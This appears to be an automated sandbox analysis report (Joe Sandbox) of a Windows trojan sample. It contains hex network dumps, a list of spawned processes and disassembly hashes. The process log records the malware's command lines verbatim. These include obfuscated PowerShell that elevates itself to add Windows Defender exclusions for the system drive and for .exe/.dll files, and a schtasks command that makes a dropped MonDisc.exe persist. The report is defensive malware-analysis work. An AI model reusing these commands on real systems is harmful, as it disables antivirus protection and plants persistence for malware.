                            2023-05-14 02:51:07 UTC3086INData Raw: 03 6a ac fc e8 05 00 00 00 54 1a ca a2 26 48 ff c4 f9 eb 07 92 74 f2 ac 29 9f 75 72 07 92 f7 80 e4 50 73 4d 48 ff c4 38 ed 74 06 56 21 4e 80 44 8d 48 ff c4 38 c0 74 02 a0 d4 48 ff c4 48 ff c4 48 ff c4 38 c9 e9 04 00 00 00 5e f1 ea b6 74 03 ac dc c7 48 ff c4 eb 07 c1 1a 8d a0 41 52 b5 48 ff c4 eb 07 d8 ad 83 c3 c6 9c df 9d e9 07 00 00 00 8b 23 c3 60 eb be a0 eb 07 b8 4e d9 9b 31 18 58 48 33 c9 8a 0f e9 06 00 00 00 ad 8d 7d 5f f0 5f 48 8d 64 24 f8 eb 04 fa 30 95 57 48 89 04 24 e9 07 00 00 00 3e 83 d0 dc 40 9d 2a 9f eb 03 a8 fc 1f 38 f6 74 03 5f 9e 11 e8 05 00 00 00 85 36 6d 7c 2a 48 8d 64 24 08 e9 07 00 00 00 75 40 84 82 7f 96 a0 9e 58 eb 02 35 c2 eb 04 bc fd f9 48 48 ff c7 eb 06 b2 69 ca ae 3d c8 9c f9 72 02 ef 9c e8 04 00 00 00 7c c8 4b 7b 48 83 04 24 0c
                            Data Ascii: jT&Ht)urPsMH8tV!NDH8tHHH8^tHARH#`N1XH3}__Hd$0WH$>@*8t_6m|*Hd$u@X5HHi=r|K{H$
                            2023-05-14 02:51:07 UTC3102INData Raw: 07 eb d5 d6 59 b0 35 15 72 03 66 f3 3b e8 05 00 00 00 69 7b 92 41 9a 48 ff c4 38 c9 e9 05 00 00 00 69 45 4c d2 cb 74 02 66 d5 48 ff c4 f8 e9 04 00 00 00 6e 5e 87 d2 73 05 e9 ee f5 91 5c 48 ff c4 48 ff c4 f9 eb 02 98 2f 72 07 87 35 7b 72 d2 3c 88 48 ff c4 f8 eb 05 96 7b 7f 53 e1 73 03 c2 18 f7 48 ff c4 eb 05 66 fa 98 66 d8 48 ff c4 eb 03 c7 73 d2 48 ff c4 f9 72 07 d0 1d cd ee 17 f4 9d e9 04 00 00 00 b1 8a c4 af e9 07 00 00 00 ca 27 b7 98 9c 36 33 9e 58 eb 03 c3 62 ca eb 06 69 fd a4 69 8e fb 48 33 db 9c eb 06 61 e9 e9 c1 d4 c4 38 c0 74 07 ba fc c3 b9 7c ce f5 e8 02 00 00 00 78 3d 48 ff c4 f8 73 05 9c e3 29 f7 fb 48 ff c4 eb 03 fb 42 37 48 ff c4 f9 eb 05 cd 38 cc b6 26 72 05 5f e1 47 81 93 48 ff c4 eb 06 f5 e7 8a 93 a9 3e 48 ff c4 f8 73 02 f8 d2 48 ff c4 e9
                            Data Ascii: Y5rf;i{AH8iELtfHn^s\HH/r5{r<H{SsHffHsHr'63XbiiH3a8t|x=Hs)HB7H8&r_GH>HsH
                            2023-05-14 02:51:07 UTC3118INData Raw: fe e7 41 99 29 e8 03 00 00 00 7c af 23 48 83 c4 08 e9 02 00 00 00 be 53 eb 06 77 64 ea 43 c6 25 9e 48 8b 04 24 eb 06 ad 71 45 aa a1 ad 48 8d 64 24 08 e9 04 00 00 00 fc 70 43 68 eb 04 71 ed a8 8a 48 3b c3 e9 07 00 00 00 32 a6 66 e8 41 9f 2d 48 8d 64 24 f8 eb 06 79 bc a5 a4 ec d6 48 89 04 24 e9 05 00 00 00 a9 80 43 c7 3d 9f f8 eb 03 fa d5 81 73 02 c8 13 e8 03 00 00 00 40 d4 5e 48 83 c4 08 eb 02 53 f7 eb 05 99 5a 2a 63 b7 9e 58 e9 02 00 00 00 fa 40 eb 02 78 3d 0f 85 15 fe ff ff e9 ac 3a ff ff e9 00 00 00 00 e9 bb 00 00 00 e9 02 00 00 00 79 a2 48 8d 64 24 f8 48 89 04 24 9f eb 07 2e 67 a3 d5 55 b3 46 f9 e9 04 00 00 00 6d 82 12 5e 72 03 30 3e 3e e8 05 00 00 00 cd 29 f0 a2 f8 48 ff c4 e9 02 00 00 00 c2 4d 48 ff c4 38 ed eb 06 86 70 b7 7c a3 f5 74 05 d3 a6 b0 b4
                            Data Ascii: A)|#HSwdC%H$qEHd$pChqH;2fA-Hd$yH$C=s@^HSZ*cX@x=:yHd$H$.gUFm^r0>>)HMH8p|t
                            2023-05-14 02:51:07 UTC3134INData Raw: 00 e8 e1 fd fe ff f3 16 00 00 80 16 00 00 7b 16 00 00 22 16 00 00 04 00 00 00 43 00 00 00 2a 00 00 00 58 00 00 00 4e 00 00 00 62 00 00 00 31 00 00 00 10 00 00 00 5f 00 00 00 44 00 00 00 51 00 00 00 23 00 00 00 05 00 00 00 47 00 00 00 15 00 00 00 3d 00 00 00 f3 aa e9 2d 76 fe ff 50 e9 05 00 00 00 9d 6d 40 d7 29 9f eb 04 52 a2 87 18 38 db e9 05 00 00 00 9d f8 ae b7 26 74 07 46 af ce 44 ab b2 a4 e8 05 00 00 00 b6 4e 63 f8 1c 48 83 c4 08 eb 07 dc 3c cd f5 4a de 65 9e 58 e9 05 00 00 00 dd b7 9e c7 4f f3 aa e9 08 76 fe ff eb 04 9f e5 ac ea 9c e9 06 00 00 00 81 32 52 9f a2 8b eb 04 9d b1 83 d4 e8 04 00 00 00 21 56 18 c9 48 83 04 24 13 eb 03 6b 5c d1 c3 48 1b 36 b9 e9 04 00 00 00 db ea d4 1c 9d e9 07 00 00 00 a8 53 a4 b1 74 f2 f1 e9 03 00 00 00 76 fb 35 f3 aa e9
                            Data Ascii: {"C*XNb1_DQ#G=-vPm@)R8&tFDNcH<JeXOv2R!VH$k\H6Stv5
                            2023-05-14 02:51:07 UTC3150INData Raw: 0a 03 0a 0e 0a 06 01 28 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 18 01 0a 07 20 8d 12 03 40 01 00 00 00 0a 07 0a 41 64 2e 40 01 00 00 00 0a 07 01 08 00 00 00 00 00 00 00 05 03 0e 01 01 03 0a 0e 09 0a 07 0a 01 00 00 00 00 00 00 00 0a 00 13 0a 0a 03 0a 0a 08 00 1e 00 00 00 0a 03 0a 13 0a 03 01 13 0c 03 0a 01 0a 03 13 0a 0a 03 0a 0a 08 00 04 00 00 00 0a 07 20 88 e7 06 40 01 00 00 00 09 0a 07 20 95 6a 08 40 01 00 00 00 0a 07 0a 57 64 2e 40 01 00 00 00 0a 07 01 08 00 00 00 00 00 00 00 05 03 0e 01 01 03 0a 0e 09 0a 03 0a 0e 0a 07 01 28 00 00 00 00 00 00 00 0f 03 0a 01 0a 03 01 13 01 03 01 0a 0a 03 0a 0e 0a 06 01 28 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 13 01 0a 03 0a 13 0a 06 01 5b 01 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 13 01 0a 03 0a 13 0a 07 01 00 00 00 40 00
                            Data Ascii: ( @Ad.@ @ j@Wd.@(([@
                            2023-05-14 02:51:07 UTC3166INData Raw: 0a 03 18 01 0a 03 0a 18 0a 03 01 13 0a 07 0b 19 00 00 00 00 00 00 00 0f 03 0a 01 0f 03 0a 0b 0a 03 07 0a 0b 02 03 07 0a 02 13 03 0a 07 0a 20 00 00 00 00 00 00 00 0a 02 1c 0a 0a 03 0a 0e 0a 07 01 40 00 00 00 00 00 00 00 0f 03 0a 01 0a 03 10 0a 0a 02 0a 13 0a 02 16 0a 0a 03 0a 0e 0a 06 01 28 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 18 01 0a 07 20 03 c7 07 40 01 00 00 00 0a 07 0a 92 6a 2e 40 01 00 00 00 0a 07 01 08 00 00 00 00 00 00 00 05 03 0e 01 01 03 0a 0e 09 0a 03 0a 0e 0a 06 01 28 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 13 01 0a 03 0a 0a 08 00 04 00 00 00 0a 07 20 f9 c8 07 40 01 00 00 00 09 0a 07 0a 00 80 00 00 00 00 00 00 0a 02 10 0a 0a 03 0a 16 0a 03 01 16 0c 03 0a 01 0a 03 16 0a 0a 03 0a 0e 0a 06 01 30 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 18 01 0a 07
                            Data Ascii: @( @j.@( @0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:04:49:28
                            Start date:14/05/2023
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Imagebase:0x7ff61bd80000
                            File size:1382400 bytes
                            MD5 hash:E1AA70E7EF25FDADD52160E9B9F37B37
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            General

                            Target ID:10
                            Start time:04:49:51
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:high

                            General

                            Target ID:11
                            Start time:04:49:51
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:12
                            Start time:04:49:55
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:high

                            General

                            Target ID:13
                            Start time:04:49:55
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:15
                            Start time:04:50:35
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Imagebase:0x7ff62c8f0000
                            File size:1619428 bytes
                            MD5 hash:EEF2E49FD27D42237FFB929E1A39FC2D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 54%, ReversingLabs
                            • Detection: 56%, Virustotal, Browse
                            Reputation:low

                            General

                            Target ID:18
                            Start time:04:50:59
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Target ID:19
                            Start time:04:51:00
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:20
                            Start time:04:51:00
                            Start date:14/05/2023
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"
                            Imagebase:0x7ff68d170000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:21
                            Start time:04:51:01
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:22
                            Start time:04:51:05
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Imagebase:0x7ff62c8f0000
                            File size:1619428 bytes
                            MD5 hash:EEF2E49FD27D42237FFB929E1A39FC2D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:23
                            Start time:04:51:05
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Target ID:24
                            Start time:04:51:05
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:25
                            Start time:04:51:07
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe
                            Imagebase:0x7ff71f5a0000
                            File size:1628132 bytes
                            MD5 hash:79F329EA2EC0C1BAED4F262F79B48BA5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 49%, ReversingLabs
                            • Detection: 54%, Virustotal, Browse

                            General

                            Target ID:26
                            Start time:04:51:11
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\MonDisc.exe"
                            Imagebase:0x7ff62c8f0000
                            File size:1619428 bytes
                            MD5 hash:EEF2E49FD27D42237FFB929E1A39FC2D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:27
                            Start time:04:51:21
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\MonDisc.exe"
                            Imagebase:0x7ff62c8f0000
                            File size:1619428 bytes
                            MD5 hash:EEF2E49FD27D42237FFB929E1A39FC2D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:28
                            Start time:04:51:36
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:.Net C# or VB.NET

                            General

                            Target ID:29
                            Start time:04:51:36
                            Start date:14/05/2023
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"
                            Imagebase:0x7ff68d170000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:30
                            Start time:04:51:36
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:31
                            Start time:04:51:36
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:37
                            Start time:04:51:44
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Target ID:39
                            Start time:04:51:44
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Disassembly

                            Reset < >

                              Executed Functions

                              Function 00007FFBAC411355 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000A.00000002.422008833.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21a7e74ee475e31a20754763548232013f8a4b7737391038bcb6a475d2a6b6e6
                              • Instruction ID: 9b9b6434f5c3a9a2a63df8923fb69f15b6acad8e47fc6adb246df73684456978
                              • Opcode Fuzzy Hash: 21a7e74ee475e31a20754763548232013f8a4b7737391038bcb6a475d2a6b6e6
                              • Instruction Fuzzy Hash: C401677111CB0C4FD744EF0CE451AA6B7E0FB95324F50056EE58AC3665DA36E882CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Executed Functions

                              Function 00007FFBAC4D39E1 Relevance: 5.3, Strings: 3, Instructions: 1546COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396508270.00007FFBAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC4D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac4d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: H*V$J#jP$R_L
                              • API String ID: 0-541420802
                              • Opcode ID: 632c72d8ee6142fac2ca18a141fb0bd31df2d6411fba446bb9654e0cf952e297
                              • Instruction ID: 939a72233cf005b78f70f1b2e6369b1c351641b66cd2855acac0d20da1fc304b
                              • Opcode Fuzzy Hash: 632c72d8ee6142fac2ca18a141fb0bd31df2d6411fba446bb9654e0cf952e297
                              • Instruction Fuzzy Hash: 43A225A2A0EB8A0FE757E73C98691B57FE1DF46214B0801FBD589C7193DD18EC06835A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC4184FC Relevance: 21.1, Strings: 16, Instructions: 1146COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396116759.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: ^_^$^_^$^_^$^_^$^_^$^_^$^_^$^_^$^_^$^_^$^_^$^_^$^_^$^_^$^_^$^_^
                              • API String ID: 0-976315531
                              • Opcode ID: 5f034be9572cfcf5f7bee24de6cd853af5cb19468167fe0814bd0a9b03dce3f2
                              • Instruction ID: 23641dd63c6bd256b0f5343732cf1b17cd6f72aec9722772c12c84014732472f
                              • Opcode Fuzzy Hash: 5f034be9572cfcf5f7bee24de6cd853af5cb19468167fe0814bd0a9b03dce3f2
                              • Instruction Fuzzy Hash: 865237B190DB894FDB46DF28C49AAA5BFE0FF59304F1501BAC489CB193DE25E842C785
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC41751C Relevance: .5, Instructions: 547COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396116759.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fcdf111395ac6c93f3fe3ad169bf503c42d826bdf3d14d0ce4513783f715fc57
                              • Instruction ID: d490d7f52967368e0924e95b935a5a24255b80f16af3fcfad478ab3a358f0a72
                              • Opcode Fuzzy Hash: fcdf111395ac6c93f3fe3ad169bf503c42d826bdf3d14d0ce4513783f715fc57
                              • Instruction Fuzzy Hash: E602E671A18A4D8FDF59DF2CC446AA97BE1FF68314F14016AD449D7296CE34EC82CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC4163E5 Relevance: .2, Instructions: 157COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396116759.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 363e282bce66836d52f368f8d200704bce9f37ed8dad11e4861b72b5ab145a70
                              • Instruction ID: a828ff1ec08dbf44ffca1e6050c54a7faf4fe83f6974dc9fa11ea86c1c006c6b
                              • Opcode Fuzzy Hash: 363e282bce66836d52f368f8d200704bce9f37ed8dad11e4861b72b5ab145a70
                              • Instruction Fuzzy Hash: E441E97151CB484FDB1D9B5CDC0A6F8BBE0EB55325F04422FD08983552CB71B456CB86
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC41630B Relevance: .1, Instructions: 112COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396116759.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9d4725501ab4ae81b3255adc028019c726a96fe81d69442b70e229670c3e9418
                              • Instruction ID: 6898c6fba4af3d066759c31459cb126674950b28fe49ddd4cda4320f8f972271
                              • Opcode Fuzzy Hash: 9d4725501ab4ae81b3255adc028019c726a96fe81d69442b70e229670c3e9418
                              • Instruction Fuzzy Hash: C031917191CF4C8FDB58DF5CE80A6A97BE0FB99321F00422FE449D3251DA70A8558BC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC416F26 Relevance: .1, Instructions: 94COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396116759.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7733e3ef5da85be8f3f531416d6b7fbb290ee8b09a1b924b82f83c793c9b40b3
                              • Instruction ID: b04fcb68fd098d5a67d7968f59facdab25d96c614f59c325d3df034fd38a375a
                              • Opcode Fuzzy Hash: 7733e3ef5da85be8f3f531416d6b7fbb290ee8b09a1b924b82f83c793c9b40b3
                              • Instruction Fuzzy Hash: 6521057190CA4C4FEB59DF6CD84A7E97BE0EB96320F04416FD488C3152DA30941ACB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC4D40CF Relevance: .1, Instructions: 93COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396508270.00007FFBAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC4D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac4d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0b18b9b5b2b0d38136547b2f6aaff8a2e64363b1579d9b4b439928d4032ce347
                              • Instruction ID: 4c16c4594332b7b4f0fae739303578696e2c88ad5b2b56c9efada4700cc86b0e
                              • Opcode Fuzzy Hash: 0b18b9b5b2b0d38136547b2f6aaff8a2e64363b1579d9b4b439928d4032ce347
                              • Instruction Fuzzy Hash: 3C2106F2D1E9474FFAA7E628845D27866D1EF94314F4811B9C94EC31E2CD1CEC058249
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC4D67FE Relevance: .1, Instructions: 62COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396508270.00007FFBAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC4D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac4d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 85a15c76f86b96b75de4d88ed73b0de40aac02d95881482d09568800e33d7373
                              • Instruction ID: 82529eb2f5106b25ca934508c4bead6864278cd70f97455c7f05a2903f7cbda1
                              • Opcode Fuzzy Hash: 85a15c76f86b96b75de4d88ed73b0de40aac02d95881482d09568800e33d7373
                              • Instruction Fuzzy Hash: CE11E9B190F6898FFB46E76884885F4BBA1EF59314B1404BED54DC7093CD14A885C365
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC4D43BC Relevance: .1, Instructions: 62COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396508270.00007FFBAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC4D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac4d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 269dcb602155f73eaaae713c67b2cc8b068c136e5547ea1d3dd6a7eb85be866e
                              • Instruction ID: a481f1c5790bed77ff97bf64f97a1baa46dc09bdf9b68f7aa4a855efeadec894
                              • Opcode Fuzzy Hash: 269dcb602155f73eaaae713c67b2cc8b068c136e5547ea1d3dd6a7eb85be866e
                              • Instruction Fuzzy Hash: 401102F2A1E64A4FFBA7E62CC4585B467E0EF44328B4810BAD40DC7192CD1CEC408354
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC411355 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
